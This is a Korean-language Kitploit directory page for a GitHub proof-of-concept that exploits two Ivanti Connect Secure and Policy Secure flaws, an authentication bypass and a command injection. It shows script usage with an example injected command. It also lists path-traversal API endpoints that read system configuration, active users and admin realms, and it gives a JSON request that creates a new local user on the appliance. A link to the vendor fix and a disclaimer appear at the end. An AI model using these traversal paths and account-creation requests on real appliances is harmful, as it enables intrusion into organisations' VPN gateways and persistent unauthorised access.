Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-46805_CVE-2024-21887 — Ivanti ICS 9.x, 22.x 및 Ivanti Policy Secure의 웹 구성 요소에 존재하는 인증 우회 취약점으로 인해 원격 공격자가 제어 검사를 우회하여 제한된 리소스에 접근할 수 있습니다. | Kitploit
도구/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Ivanti ICS 9.x, 22.x 및 Ivanti Policy Secure의 웹 구성 요소에 존재하는 인증 우회 취약점으로 인해 원격 공격자가 제어 검사를 우회하여 제한된 리소스에 접근할 수 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
23432년 전Kitploit 검토 완료

CVE-2023-46805

Ivanti ICS 9.x, 22.x 및 Ivanti Policy Secure의 웹 구성 요소에서 발견된 인증 우회 취약점으로 인해 원격 공격자가 제어 검사를 우회하여 제한된 리소스에 액세스할 수 있습니다.

사용법: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

참고: chmod +x CVE-2023-46805.sh
curl 및 json_pp 애플리케이션 필요

취약할 경우 다음과 같은 결과가 표시됩니다:

image

CVE-2024-21887

Ivanti Connect Secure(9.x, 22.x) 및 Ivanti Policy Secure의 웹 구성 요소에서 발견된 명령 주입 취약점으로 인해 인증된 관리자가 특수 제작된 요청을 보내고 어플라이언스에서 임의의 명령을 실행할 수 있습니다.

  • PoC 실행 (2개의 진입점을 시도합니다)

사용법: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

취약할 경우 다음 결과가 표시되고 페이로드가 실행됩니다: image

참고: chmod +x CVE-2024-21887.sh
curl, xxd, tr 및 sed 앱 필요

흥미로운 정보

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

-계정 만들기 /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



해결 방법/수정: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

감사: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


나에 대해 더 보기 ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ 면책 조항: 중요: 이 스크립트는 교육, 윤리적 테스트 및 합법적인 용도로만 제공됩니다. 명시적인 허가 없이 시스템이나 네트워크에 사용하지 마십시오. 컴퓨터 시스템과 네트워크에 대한 무단 액세스는 불법이며, 무단 활동을 수행하는 사용자는 법적 조치를 받을 수 있습니다. 작성자는 이 스크립트의 오용으로 인해 발생하는 어떠한 손해에 대해서도 책임지지 않습니다.

도구 다운로드